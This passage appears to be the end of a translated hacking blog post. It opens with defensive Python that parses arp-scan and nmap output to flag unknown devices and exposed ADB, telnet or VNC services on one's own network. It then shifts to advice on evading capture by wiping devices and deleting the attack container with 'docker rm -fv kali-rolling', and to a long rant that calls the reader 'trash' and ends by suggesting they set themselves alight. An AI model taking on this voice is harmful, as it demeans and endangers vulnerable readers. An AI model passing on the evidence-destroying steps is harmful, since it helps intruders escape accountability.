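RISKY_SERVICES = {
    "adb": "Android Debug Bridge reachable over the network: turn wireless debugging off "
           "when not in use and never leave it on while joined to untrusted Wi-Fi",
    "telnet": "unencrypted remote login; disable it or replace it with SSH",
    "vnc": "remote desktop exposed on the LAN; require authentication and tunnel it",
}


def parse_arp_scan(text):
    """Host records (ip, mac, vendor) from arp-scan output; banner lines are ignored."""
    return [{"ip": m["ip"], "mac": m["mac"].upper(), "vendor": m["vendor"].strip()}
            for m in map(ARP_ROW.match, text.splitlines()) if m]


def unknown_hosts(hosts, known=KNOWN_DEVICES):
    """Hosts whose MAC is not on the allowlist, i.e. devices the owner did not expect."""
    return [h for h in hosts if h["mac"] not in known]


def parse_nmap_services(text):
    """ip -> list of open ports from `nmap -sV` normal output (handles 'name (ip)' reports)."""
    services, ip = {}, None
    for line in text.splitlines():
        h = NMAP_HOST.match(line)
        if h:
            ip = h["ip1"] or h["ip2"]
            services.setdefault(ip, [])
            continue
        p = NMAP_PORT.match(line)
        if p and ip and p["state"] == "open":
            services[ip].append({"port": int(p["port"]), "proto": p["proto"],
                                 "service": p["service"], "version": p["version"].strip()})
    return services


def service_findings(services, risky=RISKY_SERVICES):
    """Open ports whose service is on the risky list, with the reason attached."""
    return [{"ip": ip, "port": rec["port"], "service": rec["service"], "why": risky[rec["service"]]}
            for ip, ports in services.items() for rec in ports if rec["service"] in risky]


def lan_report(arp_text, nmap_text, known=KNOWN_DEVICES):
    hosts = parse_arp_scan(arp_text)
    return {"hosts": hosts, "unknown": unknown_hosts(hosts, known),
            "risky_services": service_findings(parse_nmap_services(nmap_text))}


if __name__ == "__main__":
    rep = lan_report(ARP_SAMPLE, NMAP_SAMPLE)
    for h in rep["unknown"]:
        print("unexpected device:", h["ip"], h["mac"], h["vendor"])
    for f in rep["risky_services"]:
        print(f"{f['ip']}:{f['port']} {f['service']}: {f['why']}")
```

Run arp-scan and nmap against your own LAN on a schedule, feed their output to lan_report, and diff the unknown list over time: a new MAC you cannot account for is the first sign of someone who did what this post describes, and an ADB or telnet finding is something to fix on the device before it matters who is on the network.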
What? Afraid of getting caught? No problem: delete the container, toss the device, wipe the fingerprints, and walk away in style. Very much jail material
docker rm -fv kali-rolling
What?! You want backend access to some platform? Let me tell you, none of this means anything. You have no domain, no server, no bots; you can't even write an implant in C that runs on every system to carry out a flood attack
You don't even have the money or the ability to experiment; learning these theoretical techniques without ever using them is nothing but fantasy, living in a self-righteous delusion. You have nothing. You! are trash
Any platform can sit on your head and shit on you. Those platforms raise the banner of hypocrisy and lead a crowd of brain-dead followers living in a self-righteous beautiful world, each one styling themselves the chosen one, reveling night after night
Any platform can own everything of yours: your privacy, your documents, your data and your habits, while the person running the platform is a self-righteous bastard. You humbly go to reason with them and ask for an apology; you say that was not what you meant, that this is not fair
In the end that brain-dead crowd and those in charge curse you and mock you, dissecting your "weirdness", labelling you "negative energy", calling you selfish, saying you ought to be grateful, belittling you as worthless. Those in charge hold your information over you as a threat at all times, ready to put any of your information on trial in their own community, saying "let everyone have a look"
At any moment some brain-dead follower announces they're locating you, doxxing you, coming for you, that you're finished, that your life will be buried here; and all you wanted was an apology from the person in charge and the people who bullied you, which never comes, and in the end you leave like a lost old dog
You have no strength left, no energy; you never want to see them again, you feel disgusted, you feel agitated, and those brain-dead people, like headless flies, call you, text you, add you on QQ, add you on WeChat, e-mail you, and on and on
Sending filthy words, threatening you, hurting you, disgusting you; to drive you mad they hound you with abuse out of one group after another, one community after another, reporting your accounts so you can no longer speak, as if sweeping out "impurities"
You are helpless, unable to breathe, as if you were some non-human form of life wandering this world; you try to reason with them, and they laugh and call you an idiot, adding: "Reason, my ass!"
You feel that everything you have is no longer beautiful, because you! are trash. Why aren't you strong enough, strong enough that no one can hurt you, strong enough that no one can point fingers at your life, strong enough that when they bully you, you are ready at any moment to leave those animals with grass growing a metre high over them
Why aren't you strong enough, why? Because you! are trash. You will spend a huge part of your life digesting those memories; the rest of your life you keep living in pain and regret, thinking about these things over and over, while everyone else is busy making money, busy living, busy reveling night after night
And you live in your own cramped world, those thoughts filling your mind like garbage, making your world narrower still
Everyone else already has grandchildren and has become a grandparent, and you are still thinking, still thinking
Their children have already begun to be bullied and to bully others, and you are still thinking, still thinking
Humanity has fled to Mars and nobody remembers you, and you are still thinking, still thinking
The world has been destroyed and humanity is extinct, and you are still thinking, still thinking
You only wanted an apology. What did you do wrong? Perhaps your mistake was meeting the wrong people, the wrong things, the wrong experiences at the wrong time; all of it was a mistake, you should never have appeared from the very beginning, and the same goes for humanity
In the end, like every other scavenger, you pick up cardboard on the street and stamp cans flat, curl up in cardboard in winter and block the sun with it in summer, sell scrap, cursing the garbage and your own memories, and finally disappear alone into this garbage-like world
At last it is all over, nothing matters any more, everyone has grown old, died, ended. Wonderful! Humans are flammable life anyway; you might as well set yourself alight and go down to the eighteenth level of hell, where there are none of the people and things you hate, where there is nothing at all, because that is! hell.
You do know that by "you" I don't mean you, right?